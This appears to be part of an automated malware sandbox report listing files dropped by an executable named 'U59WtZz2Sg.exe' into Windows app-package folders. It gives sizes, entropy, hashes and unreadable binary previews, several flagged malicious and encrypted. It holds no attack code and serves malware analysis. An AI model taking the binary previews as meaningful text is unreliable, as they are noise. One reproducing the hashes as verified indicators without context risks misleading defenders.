Preview:	.....G.i....(.?..UM....!._$4a.............1...\.t..l.....}]S4...'.?.`i\|h.&.".g........)+.%.6...%.t.d^h.X...S..3..\|...Q2....{5..e\..Z........Pq3n.. ....o\|\|-...R^....z....^........p..}.+0.GqaR..Az....{.......N......H.......h{....]..\/.(z~V.uw3.O....%&%.l29.[....iX.........L.9q...J..!...O......{....\|i.S..).-....!...TF..8.....<......(I.'J%B..H.1i....'......(...h..QE...B]...}.......6r7.....#..UK.$.....#...JX.iMR..?..M\|.H.u.........X.S.....(e.H....6......r\|.0..m<A..9...9.....F..$.\.SJ.u..................kI....XS ......6^k0....CK....8...x..C\/.`l...q..l2..-M....O..'.c.lS..`I.z.....\|,._@...c..w.D+q..y.$.x.x...):+D./.H...r.s.\X/-*Y..zN..@.....vCH.V....\%....{.......y.a.:Z....n...P....hyG..{.w-)X....^w.{...n...)/@j...)...1j.g.2.v.<....-._..F.B(.p%...J.&J.....'.N....R@mh..d..e.+.'.w=.ZeQZ....6,0...oqh.........YN.....[...<....h...... f..^..`.'.......//.,x.<1..4..a..\......7..rA....{..G..".... .{.+..Mb....Q./..M0>j..e$H\|.%...@.58......m...o..

C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.976624794714371
Encrypted:	false
SSDEEP:	192:gMsu/HLRb7dkxJ9uxKJOaQXPESR4nVg++syGIlMDh2K:gVu/rRW9MKUXPEbB+sy7lMDh2K
MD5:	53ADA4C3F71582F176EB1B62ADEB8F29
SHA1:	1636849E59684EDAAC4E37C2D2DA05010CB83E60
SHA-256:	07F0ABB2E41E37809E3D4C171848AA02A81EC7BF8BAE3F3644AC88D8DCC0970D
SHA-512:	A79B26C3DA3E8710F989BE5BD878EF6F6B036CC065A8EFFC0D6B17940BF925AB015EC52A1310A4E269C1ED628D657F5A7B73688C8A9C5DFDA31F5A195E88846F
Malicious:	false
Reputation:	unknown
Preview:	regf.8.b..{oZv$G..U...(q>.s..qe..(...:...L).i.22..v.'j@..gd...V.%.=9;.C. K..A6.p..5.p$...Y..o.z?./\.....l...sgHP.V..kD>yAzwa...,."!]).GD$e%P.r.1....z...&P..!.-.?.......h.%X.....>@#4.3\|{c....g....3B....8...Q.3R...M...O...z.^....`.Y...&32._..p.c.?...#.S...=b..T.......}~C-L.^.S.z..U.s..@!Q.2i:..<VXVU9e_...r.....l..6...W....0%4.4.~.lV...7..;.K......hb...V..c},..+..(.\|..v4)...E..a..njP...<....B..f.B..&c.a0..#;...AF..Q+\r...2".O.&..)k~?4r...X.9..<..\|1./Iz.!.AG(Uk...'...\@s........'7.:~...D.3.Krm.T...`^.6.oI~~.\.n..Q".\....r.......z.\|/4...H>ug}.........~...P...kcYN.....!f..bQ@NNi. M..n....j.VC0.H.#./=v....z..$...0M..`._.3..C;...v....B.z..m~s-}..z...0:~xF...q[...<0j.7k..;.p3....<87."..c......&S6...v..D.....o................z...WW.....K.]@.:6.Z.SU_....{..47.....Eey=...............W..KVX...m^['V'..2.....u.>.m.[..\|...m..PX!H..0.....L...Y..}..0q.=..j4j...c.h....[gx..m}k......).....l.6A...w$.,..6.Y...5'.'!d.,.C\|0]z..8U.%..6......G..g.{.H..\|.g..

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	65870
Entropy (8bit):	7.997183992957578
Encrypted:	true
SSDEEP:	1536:lLXQr7dZn1eS2T0bjp3W/oUkSSIVdRoqUr3t2NcejfmjA3OUrRw+4w5+UF8:6r7dZ1P2gbjp3mHkqdRnUr3acej+8ReF
MD5:	7C24541E5900F1ABDE0F375D57C8EECF
SHA1:	CB36DE9241DDF30AFAE4EE9B8C37236E0D54F294
SHA-256:	B4CE742635854E20589E1FBD43FFEA91B157471B84A2668A4F88D5C8B889771B
SHA-512:	0B82457EC08D49E0653E95C27066DCDFC53A937865B559B0EEEB7DE78C6BDCA8A8D4375F2F2991ED8F15569B5935EB8E8AB2B249FC45666A6FC95622684DBA3B
Malicious:	true
Reputation:	unknown
Preview:	......r.O....M.".6D........'...fs-......6...f...&.%.I...m..k.{.....;D-.M....G..a.....mz.R=.....?.R...%....C...}.a...IyQ..H....z.._...m.n..C).]..{......UQ.._x..Z.^..r%.^. ....7.3.n.1.....F.q..!.+.,.ld\o,.[.(}../S...O........Z2.r_..>.V!.l........WO.bn+_..P..Q..~Y..c..!T....C....Rl!x.Q+....<{......I.....0.....c7V....A[.m.O.:..~..etm....Qs......NX.kW<L...7..rl.e.1:......U[w ...2.T 5....A..9u...H..;Pqr'"..+....\|.Z....OJg\{.=~..Z..F.1 ....1x..D.;.5p...gB..[...B...;..Ws.... =.w.....5V....2..".. g..#.]-..6........`,&..8.~..S.b ...Y........b..w?1\q.$.0C].?8.go.~V.....cd0..J:..&....v....-...@NBt.}...X..#...C..F...,.O....mav....sc.......l6..F.b.:..~F.hW.p.....U:!..Z>}.......+.J...dC...x.J...-.....k`*.b..L.g,..Y...I=.^/..H....L.\|....X+J..M..Q...>2}.7v...._ tX..R.(7;wr.]........H.M....qf.......u.XQ.3\|..=.ez.U...1..u.>.~........+.X..{%.TR......F....B......V.Z......A..M..-.m..(-C.Y................=."...N.~..M,...,.=.<E:oKd.....@.u4..i<_{v......RH..%.>r..

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	131406
Entropy (8bit):	7.998690966230557
Encrypted:	true
SSDEEP:	3072:BzSflpAwlVNlSAXdPuJPhF1YXv2w2IeWOERV11diueB/L1nR:pSDAmVNl3O5F1Qv2w2Z57nDn
MD5:	509E7C2B1B30210D7A1A7A55BCF01504
SHA1:	797E54C928F97D2D01A1E446EE3AD06AA64F0C27
SHA-256:	95DDC94CA1A49C6429A62BEA3704102EAFBADDB2B6863882A6FCEA2BE7846E5A
SHA-512:	E08101AE03BE0AEDEA75E51A5D8EEC716D3122BC1119DCCAC1E108F8430E3E64B411021E382A96095CE073C77FE4838B4BC3EF9F12CAB5ECC81B0F416250F6CA
Malicious:	true
Reputation:	unknown
Preview:	......!_['U...B{.IDw~,.j..yA.O..9...H.?...Mx..{=.......^.Sb...4.....b@.L..G.).......... Ap<'.$.."/.....R1.f4.... A....(.t...Z..}..~...x.\l...~zW...to.......X...m..+.[W?t.4..qjt..+\\|3....O.$.y..........L...m&OC.....+. .V....2.j.....$..c,.....1.]H.Mv...P^@.s.:....(.x}........ZY.~%..".k9a....>..A4\|.&P..8../U..,.....].o.._.&..m3..3/Q..d.A....M.^....X.Js=....r.....OI..j.~.....\|LD...Y._P..r....j..//<.._..N...7..X..........LD......W(Y......6.U.S...H.f5qh7..%T..C./....i.xQ..zB....:\oh.z".[....lg..e.....9/..x."d`e...km..(..6.Bh...........Q\|.H.oI.z.B..z...J..X..+.MBpN..x..)..v.l..El...i.9.../h.i)y.CIJH...UD....Jl.W........S?s.s....O.4.?DCT.:{[..]..E.b.7....Q,.A....w....R........\|.^..S@.!.....6P......zK.H.$.....yfu.f.~'........x....y...D.8Q!.:As...%...-..k.e...i]k....<4..f1.>.a.R.......".V..^.p......H{nM.j\d...I\|.i.Q.8B.[.....Y.I....e./0U.&Uu.A....=.........;.....N..1.[.........h\.>.4/c.OB.}.@=.Az6=...}...R.s"...8\|0.t.6r.&...o^....\|.^.aQ].r`

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	131406
Entropy (8bit):	7.998618360343294
Encrypted:	true
SSDEEP:	3072:sWkgKjpWzE/0jw8DKXwyUfurn3Kqm9+RzNqp5pJ3G:PzvjtD8Fi+RzNqVpG
MD5:	C056C3905BD20925B97297C6DE41261F
SHA1:	AECE37BD7529456599E5A58609D12296E3BD04C2
SHA-256:	81C2AD55B80F916AF5B0956E025040F43290B656074AEEDD1CEE286AFA60BEC8
SHA-512:	15DC6144738F56E3DF27E22B6EA280CE65E7AC0CC003FF1F44D4481D4FD4AE9E7A8C81C182B46AF2006A76608E58A04F5AD0606F77697338E77B6407350B28E1
Malicious:	true
Reputation:	unknown
Preview:	.......]..........E.7g..=.;..H.3.>... i...h.3Z7......).j.0}tB.8...A........@..B...t$....B.E.7...<....Y.X.k9.}S..$7..(]t6!v.b.0...?.......W.~H......va..S`.."<...0..........b/0....$.J.=h.N...(.F....{u.<..h...T.9.}.C...Bhk\|.n........h>sV&.....f..-....4..aq..7...`....d).h..!h..[..d.E..;..L..qM.;s7.U...QK...'.[D..b.;..r.O..,.V..C2..d.....W.c.ub?.m;i_.!........%.'u.cJ.........N..)I<~Wax.'=...Z.zT....Jt..{,)...E..I..= .U.v;..n.&.!.......z..\|.....)..[.....kA.?8....v.3..c.M.I.8..a....z..H..W.E.o-.v?(....i].E._;...3\....M..n../K6...9.9_.....l..%r.md..r.tO<..$..!."7.........A...t.....kF[..8D...vJ..tt..m.Prw6.r.BPx;ENH..m..'(.........g...S....RK.O....O....O.z..:/.nXc.khNW...I1.!..6..M4l@.)x......$PK3...l..s.+...4Q...'....Yv....\|..v&..n2...g!.e.B:..Nv._..i....#..s.D3..CY.%.Kf4..~..,.=...l...}~./..."+...;....7;.ic.r8...0.\|.~fL.D.....\.jB.E.....]r....V.g.e..J1l...p.$.e\...."Ge.....[..?L..\|..a..u..^...........kPv...#6j.P.:{.t...R...

C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.981480674760083
Encrypted:	false
SSDEEP:	192:0gBtMfe/DNFr9qkrV4JHe3BAMdKooqw1wQYXylO9t2znBJ:2eTr9qkJ4J+3SMIxwQvlOjMJ
MD5:	0A47283AD2F32A740DD2A43CD2DD9D83
SHA1:	EB173A13B0FADD72824ED38EB40456DB4A6589AD
SHA-256:	F01BAFCDCF9042CD78C8C6DA6124D2F284D1A7CB7E16506F74B457E74260EE08
SHA-512:	FD07EAAA568D8034116A830255E46F464F6C5DC8AE7EF8780E2D84BED1A3B9D647DAE43552476B9C4CEABB9DF5B4FB8EEB8A82D84783B5A343DFBB0677873582
Malicious:	false
Reputation:	unknown
Preview:	regf.J.r<._.\....M....\|.....W...~.2...?T.[(Y...]A.......f...Gm...(...^h..a..AG\=K$4-.s..........Md....B.>LT.k........"...c.F....bM...8..]..,N.....'..V[.T...j8x.M..u...K1......?~,...Oi..c#P.....m-..p4....O...u...-..S.2.7....X...w.@.O..W..v..<....L."...!..%.+..?......}`!..Z..........nh.Wi.......gn...E.-..`....}...O...'p..UNi.4 ..I..=5.N.pA.h..fH........,.mT.d.4)%.R...gkK.,L..j......YJ.f/6.=S.... #..`.5.k..$......;........q@'q..R.....XH.bG....E.g.RF.....6.K.{h...I.n.......i.i...'..b....=.w1.".y0$B.........gJ..19.t...x....$"....a.F..f..;.$,.<5...,......B.../t.\.....B.U.cP-;:,.$u...9.D.yCw]..d.}......>.e....r...G...`'v..=...(..[...C.o......s..`R..`{5..g. .j.Y....~..M.WL.>U.........T.i.(....R0.....P%.......5#.kJ..{..<(..c......r!p....N..'....U2aYG.ZGt.hn}.A?.........e..e.7...l.N..k.x.+.+5....../.s........z:~o.......H.%`R.h.C.=.Q..e)R.-...\|.I(U..-....a......I\\|,..V.N.#.....?.ktu.?<7v........ZL>......@....I.WLB.D.$.LH.U;.....\|g../X.k......q....".

C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.975178260828631
Encrypted:	false
SSDEEP:	192:YqDbCgbCHn8Egxdi3X/86F8hwaaI0nDJuCkzn2B25q0vkuO5EGhfwWI:JDG/H8ViNF8hL00nk253kuO5EKI
MD5:	DD1AC9E01CD6EA5F2ED9C55A5471E770
SHA1:	B3ABF2800402ECE13AA6ECE08DBDAC574C54756A
SHA-256:	625EFF468FA08C6A4512980E8790C2DEEA43EA7CF167B652BBF6257E813CA6C5
SHA-512:	BE3E3A476A3C011F5972E328168C9BFC0C1CAD1B4A8AFF6362C40D70291AF17F09F77FC8F484BD25E81505FE08318EA773F9532F4B4BD318B3FDC2D5C97C03B3
Malicious:	false
Reputation:	unknown
Preview:	regf...V.G...8.2...C\|...z.--A...@}.P.V^..1a#....I....h..:...f...G..\....jx..?....n.,d..c..r.L......b.....w....P=.\..?m...w.;...p...\|<#.6f..J.{1...)\0.!.y./....(../k..k.a3{...p.....7._..e...q..F.c.mS......@.m.....w}.]...0......Ro.?..(0.m.B....n.....^9.......F..%...-E..M.i..tU..K.`b..).....d....*...o.q\.J...tP[.O...>^.QS....7Q.......)Y..`.zh.h...........[..3.d..x..6....nT.<.q.9.....a......o....`W.t@....#...p...-.Rv..n[....#..n.N...f~2...R...W=...}..T~.y.~.h..byR.o##....e;....)yw.}._.4...b.y.\|......\|..06...).....l.A.i_..l.QF.g..:,St5.....f~Mf..A........~...P.\..Y;.....-zhw..#.y.#&..I.%..QC.SW...7d..L;.e<l.3.3M^.N........r.....&...T........2.....7D..!i.b.a....x..S.[.....q.U ..m.X.IF..J9sK.#D../3.ME...(s.I.......F.?......b5...55j..D(J.5...]...).F...W......._.w#S....&.......A8.'.....Z.n.I.m...... .I .ti..e+7TP.........~.O....T....vpYY.A[..:./n,E.........G7..o..=.k.!.;...q......... jdZ.A...q..2..+.R..f...?W........G....>...j.o6....

C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.976562284636702
Encrypted:	false
SSDEEP:	192:d/U7hBSi5lrdKVbpjCk4PBxm2GhlTSkbulss5O7ayQ6VT8D:9U7hBSi5lrdKVbIBU2GuolW6ayQ6VK
MD5:	4A4330C3897D7CED926E35EA14AFB04C
SHA1:	48755CBF7BC87A0B519F6F0ED1B6CEDBA5BDA386
SHA-256:	AFE1AB2E4BC78FB783DD2A3B234578B75C9D8164B390E053909D4B7C873A770E
SHA-512:	D0F8CC346473D750DBBA46410EA3C456BF3A43E51250D1DABD08FB81918876DF87F8B83185A63DCFF7B83BBF1E2110695D5AA118EA1448389CF05AE8A07DCBF5
Malicious:	false
Reputation:	unknown
Preview:	regf...k.n.\|&.\|r.6..+...]..!.y....y..V..-...WLCj..(...W...NU.-.....D.&.-.w.%i\.;..B.-C<Pj..,..w.\.0..>h.......!=yW..X.6....F#>.?..e...l...9..t.]..4...)0.v.=.b...m..m.:3.~o0..y:-Y..F.5H.. ....C0...H21..r\|....._D..^j..De.?,.Gh..$.j'.A.:<]8....ZhQ....D....q....._h&gMv....:.9...b.>.y..._........r.9.e.O........$....B..g.f..g...N61........g..%.et...y....-.....g..YpoT.f\.K...9~.....K;.l.".$.&.....`(Q.Q...x.z...Z.=....&n,-.n4.F..}e^.Sf.r.'...hY.5.j..1....~s......+.=........^...j.(..:.6..X.U...n..P..T.u.q.b..#.Y...o...F..\P...GV...+...=.O^.fA...;.}..t....E. u.f:!..!U-..].i...^..R...^.....2.....'.........,.....t.5D...E-_.<...'..1e.O2.c.......,f..jN'.b....2.FQ...x..y..%.....T..%.zb.bO9..0.L....p..A....!.=...F .nsH4._."+.."..N..] z."p.1...oI...V....z.+c..n7.K[._65/...o.:8..Zdm....X..5>......,..J.N...D.....s.4......\......9.i.6.oR'...b..#Cw.x..[v.....J......$..D...g.....`.{P%pl.e...h$.~9....;..`,......k.c!+i..mDZ.HuM.a....).&..w.Q......,........

C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.976237306102046
Encrypted:	false
SSDEEP:	192:Mqael7fKEwf2fCq9cXJgxWGnAgkfbmi55JKOjez1mkSrG5rR28t:TtSf2fC/gdAgu6iLI0e2q5cC
MD5:	E6609949D12BB133A569E2B6D7F152EC
SHA1:	172B5F176221DDDC7D54F685A40699D1CA5C687F
SHA-256:	15C38E347562A0F02FA16D5C32CC11E16942D02F97F3BF92388FA6BAEFA10103
SHA-512:	7A0E2AB3719BBD273520321EE90069CABB02519464A38444DFC099A9A2D7A5413226C2AC5DFCE70BAF8D99C859F78B0C024AD1060A639374F288A7D1886161FE
Malicious:	false
Reputation:	unknown
Preview:	regf.<..,.....o.gi9..b......(,....1I..F.0.......y...s'.b...<y...d4.GL..`..+.n..<H.v...K.....d.T...j...sl.(.K..<..m......]...%^p.Q......p.....]..sv....Z..#Mf..._...7...n.C..@.th7.H.%.L...!..,[Q.W.W.,..e...mB,..A.N...6`.O...Xl.#%.S....5..z.`..Em.o.x.+.._....to.5.U,p.ts..H.P.<.^.......[.:..$a.#\|..S g@9......=s/..z.7....8...6"}.l.@#.Y.....".s.>....}A.^...&.7n...`.YEZo<.(.;E&w ...U.i\F...?...j.RH.(./.l=.1.W...DL`. ..3..1..\U..^.o..2.j.....p.v.X..l.....I....8j....z.]..y..fj..M...p..V.q.C.X7.P.y.p.B.....7.g"..n..Ol-7p....[.E..7M...D...M....`........I.......M?..Zt.J........'..U...7Z.4E\|g..Zs.}.~,...t.Wh.V.C.....U...s..x...X...I..wo...C/..X.......BL+....~.zW. .^Wj....3.9.h.b........35.Q..;.7G...x..]cj.....N...>ww...(.R.....q..9...J......x..y.3.".\|[....TT8....CC....."..."..B....h.U.)...Zs6*.hj.9....g.H.}j.y%..`.0%.Gh".5..y.yq.....%.k......:..`.F..o.:.n....t..+........\|.'./.........+[P..3HK@...,.e.[\J...D.N^<...V.Y .I)..(.......I....]R...7....y....9\

C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\settings.dat.LOG1

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.980441568005906
Encrypted:	false
SSDEEP:	192:V4olCczRSJu7MeLXGpEYJcqJ5Z24v7P4i79/CYvrbSBR:VjpzRvMe5Q5b3TJfTbg
MD5:	503C973E74649CFC8040C887CD72429D
SHA1:	A8CEC23FD522FFB00B8A54B45DF3788765C68A8F
SHA-256:	8B1336312DC7807CDEDBC17E9FF9C276FD992BA798C2A08C55DA863A282EF330
SHA-512:	D13DBA113BD1FF04643027B8DF1343DAA0D04B37FFA3E42882C9BFB7BEEB3FFE63AC01626F53240EE0C71C70C8D3FEEDC14938FAF376EBC97B8F8020DB349EE8
Malicious:	false
Reputation:	unknown
Preview:	regf.h.^Knh.X....!.5..........K?.....r.W..k.}.!.......4\|...i..D:..N.6.MU.'.U....,..S~.a....2#9...-.!.....r._.8.... }.+{..]j.p.+.....l....;......J(.....4P.q..KY..Z.js...@....+..kY..?.Q.#\|~.D...J.6ByZ0..Y.. .k..c..K....=.'..h..H........m........`A.,.Q...^p........e...h...j.E.9q.N...../.V...+.......U.b .I].G..C5.c.I&.@...x.L~&.....A.l..`mx.0.\|.....'.ib...:..8..3.CT..e...F.)E.c...... \|..r..;d`..w......7..(n.e..3.\.&.X..RN.q5...uK..<=.z.........+[-^........Sl..t...V.N.tN._G....gz2.B.9..!.B^......;...<>.>@.MS.F...&.........F...d.JFP....}V.....MwF.'.%.....1.![.oAA.....d.... .H....V.K>.....;...w..MsjpGNLi.A,..5j-Z..tN6.B........<FP...s.....^.fM..+..d-.Z.Lq..P..Q.....i~..v...X...f.....6.O.........@.^J.W...?bH...?~..3....J..........8`..l<.\..uj.&.Z1.]......0P.@..a.....[Ay'....0...6{.?..JT.n4.U....:.c.<.(...v.....:.....m......\|-...Q...M...]...-"z'M..:./....@...,.s.S.Z6.]/^Q......vr...\..._..A7.....E..9.......b..(.C..+P.F}.e.X.K-.

C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.97970761081618
Encrypted:	false
SSDEEP:	192:AMfDFzXpY1O5d8YsS6V+sO4ROic2OocwnByGub0:AMfxzXpYQTmViQOSx
MD5:	251B53CE435A14BC8657D89AD8080FE4
SHA1:	1752249BECD4EC4BFE32034EB2FB9FED2DAC1979
SHA-256:	2AFECA77EB07DE08B7DE1920D99CA2CA87B136E370FE42C9C4A23600B92D935C
SHA-512:	60217C14352B4E6567DC4EF084E170E800A7A43FA76948BEC651E8B99DFFE33F9660B6A23ECC374FA15F949536811B74B4AD9640D6DC2C028BF60C47BBEC6751
Malicious:	false
Reputation:	unknown
Preview:	regf...B.`C...[Z.%w.\/\.O...._Q...u......s..jYkX@..!.._....$v]g..+..&..f.....:....."..]o&Z........y.H..pAi..MU...._.4.i...\|O........CE3{.....s...a...o.^.T.r.r..VD...._mH.h...........4..K$. Yca...5......'Z.W......b..9.8...}.F....J74FB....Y;...."A./.Sb....!..Vl......MT.......pE..v...\|\|l4.J~...~..P9.;.6@vb........x..t.ip.......#...u.<5Q.C.t....hz.@..n)..8..Shl.!..u....RL..d...dp..ze#}.E/.UO7f5_3.3}....u.EN.N.Oz9..o.[.D.P>%.A."8.Xi...O..B..t..f.......k.L...Mc.e...$....M.6.p...u^...?.{,Y.C-....,...@.itx..T.....(T.....We...f...!j....K.~\._.0=..l.....u..8..@.4.....`6...:.R.h...".;{.C..7.....?~j.a@...~...`.....VX....+g j..+...&kL.s[D.:qj...M._....1......]..;.Q@;.Z=.[......d_;1..... ......$.g.'9.]&].he.....y....Ao..^...z....].......RdG}..,....V.. .o.YU.V...N.Y.\....@hJ{....>..]pJ..wL..Ib(..24.......w.Y ......R`*....jFeC.<......X.....qt.TX...!..n.<..N...A..XB..?.b.....$3..@@..z.....Aw.).C.Q....?..m....0.x...).{}....uB.C..,F..Eb

C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.977452995194849
Encrypted:	false
SSDEEP:	192:sizVyJQnMBlTHX63k1QLMnFSamwD2paJC17U7cZghNL:siYlq3x1117kcc
MD5:	55FA8B81E264B0B5F80170FD9354642D
SHA1:	6B8BEED35F9B1F4BB108A47FF2292B7DFFFEF238
SHA-256:	84026BF1246CFD96785D914F5521BCA9BAE616D3FDCAA0910A5AD6485FCC9551
SHA-512:	A41E1CBAFFF65F9ADAEC0DEEEC07FA100FC80692ADE56F7DCB5A6FB719FC5E7072A6FBD455BA732DC16D280A5C8E1506A41EF68D47AC0DCB95AF55A7225F2F43
Malicious:	false
Reputation:	unknown
Preview:	regf..\|...~.NZ\8....f2~..P.z......d...z..u....uya...:...B..WC.....Sge..../...........Y&}..e...,.<lM.dL.]}..i!......,.....O..k{..$..5.[.O.0.L..mj0g......tI....Qe..H...7.n...?ea..\s..p..M4m.K..........=8x........J3,MPw3m.O....W\K.LR.O.$y....l.....!2..~..T.....n....d..I.-..q.;......k..x....0.....x..O...o...K.....N.96......,U...k.m.eS.-...)DY.\|....)m...+...^r...5.z..SY...~..1.........0........~....l.F\|.......$.)....@.....W>...@.c.CP};.V...\|j.G..#zd....gZp...wD....Jp.....A9....{H.!..t/[._..;..).{&..R<5.,.&D..k>._....>O...@.:..I...E...B-lq&>.x....cA...U.%..-..c.....=.3L...5.?.p_...n.......Q.....f33zr...T......5..xv.?...{-..Q.q...m....C]S.......n..H.-.N.?f.e...b7..v..v-i>.v.."8...=.z.{i<......y.@..,..W.....k.._G..$2`>..E....J.`...NB...%..Vd....L.zwk.u...?.C.....0._.I.E.G...."^..(..?.F..<......."c@.l..8..i.$....m.g[\|..d..{..........$.g.".?X....r....}J..v.-.."..x.-....5/..6.}... cz.j"..p.......\.SF..q....F..8.;...;+..Z,..w..`.-Z7iqO

C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978625733700613
Encrypted:	false
SSDEEP:	192:042EflXYRLwxu/jRIGZWmS6pdT2Z6xjwlbeq9KH1sGtKOZB:D2ilYLmu/jRymS6y6xUlbepVsGtbZB
MD5:	49DC09A83E408B582DF3D4A0D4A6D6E4
SHA1:	DF11ED2ECF2FB3DB58479F93FAE347CB8623553E
SHA-256:	018F8E54989A8BFDEB4A2FE709780F42944115DBA437A5BBC16D06A3B07414A5
SHA-512:	9CFD3131D91CD5A6EAFCE9B8CFA8145496C6251581A77C869AAE4C6222542A146DFED36C0B540BFF0137183AAAE44D265BB535FB489496BC8777031846AB2989
Malicious:	false
Reputation:	unknown
Preview:	regf...:.....Ob.J......l...#0.L.......A..mf>.....p.....n...^._....s.g..UM`....i.c.4....F.Z.9.1T.t.6....1...W..$#Y..=.,F(....<...nw...:.....p-....E.+.+..(;\.....il...n...r...+k.....R...\|Y?l....YP[f.p.V.Qb..K./_Z....N.$.SRQ.....xQ>...W..m..a.h.0.3.....1sK..........(...(] .....8.....k..........(.Xt...t.....~1....FOE..c.~.9k]@Q.....(...H.....$......./...."..j.. ...Mr..8....c..S....Q.W&....A$v-..zP..P..."N...o......EY)o.eV.....k..;.......^Nio...........D9..ipn..0.....p).v..,..$h.X..0...zf..h7...%T.t...R.?.E.d....../..ob...;/...-...D..7=..q9{p.......Ad.. z#...@.K..3aG.u.9.%..ze...........Z.-..$e....V...^..BT....4......(.M.9}T.N#6.H...3.lYi..331b..f..U....#V...c[......Q...O...Vo.......B.<...C...5...S...D..(.?...w.......EF...,CO....p.~#pt.\|.32.'...9..........d..........{...h4..d.q.C9]CH!..2D0....TH....B.#.q...J...3.S.#Ki....L1...m....f...&.sK.4.yKO;Y...oO.k.P.a....3........(....*R{'.u....{....'...j..l...$w..]...6.{4\u...S..l...o+...

C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\settings.dat.LOG1

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.977480908285455
Encrypted:	false
SSDEEP:	192:Fyq/NzLefSgJEXdRDOLGePKvWvJf6m8bLkgBsLA2:Fyq/NzLqwdV0T4WfT8bLkgiLv
MD5:	6EA441B095FFE4090E6076D7DF537575
SHA1:	3F2B55E387FCEDDF4E9C7C55A588409C251DB131
SHA-256:	6E5790DC2F1B6DF1BCB512876EC7F7A3ED544B5488B1CBDD52C000CDD5C306D4
SHA-512:	74FC7D94CF21B8C627FEBD104A8424EF85DD3B7D56AD3A7213AC53DEF2D8F04C1C243703A7AB743100561DF2FB899BD453D8AFB1077948CD7AF262ACF6290CCC
Malicious:	false
Reputation:	unknown
Preview:	regf...iWn..2..b..0w+.8^.o0S\|{d..........p..o.IW%@....U..\..(Bw.5Y....Z..0..^....^.@.3.D......rF.q.\|................+!..S.`B....`z.c.d.(....J.Qo..WUsT.. ,M;2+...pt.#.....w..q;...UM... ..Vl........+.$.....Jp.d....`....>..^.x.w..i.hA.9_...%An.`.^.........tbI?..H_ir..4..e.15..p.A...-P.v^.........iD.,..O..~{...g..Z....v..)..0..H.#3-84..2...Q...A.Z.m`.C..)ed.06.q.x.....1.K....1k......K.u...w~...hL..G..J..E.P.3$>Y+.R..F...eB.[g.m.`.....)..m..)..+..R.N......(....I\|.$.O.{.n,7....d.C...u.t.w<U: ......^;.yPH..v..{..uo..#.........5........w.3.j......m9%..r......X..V...P....t........{....V.sK....a.2..vnZ....c..z.>..}c...a.V.h.J...QyRkF?N".N..Ld.:.^.>....Bu..Y..5s...w\|..{HH..b.=OV....,..\|.Ve.5.>.&Z...\|....m.Q#.W....u./.e...&].^.i....p.....^{....t\|.f.V...\...6...$...`b....N.!...LQ..'..UVdc6=:&g....~..g>k}..)....MH:.[(.a.v.}.......FP\3.j...W(<.W5D.y.D..)K.%.5...#......Zh.<.Z.+i1..V........[..Y..4f.Dx..".Q...Q.??..U..... qS......3..JL.5g.n.8_......V"

C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.977859593891822
Encrypted:	false
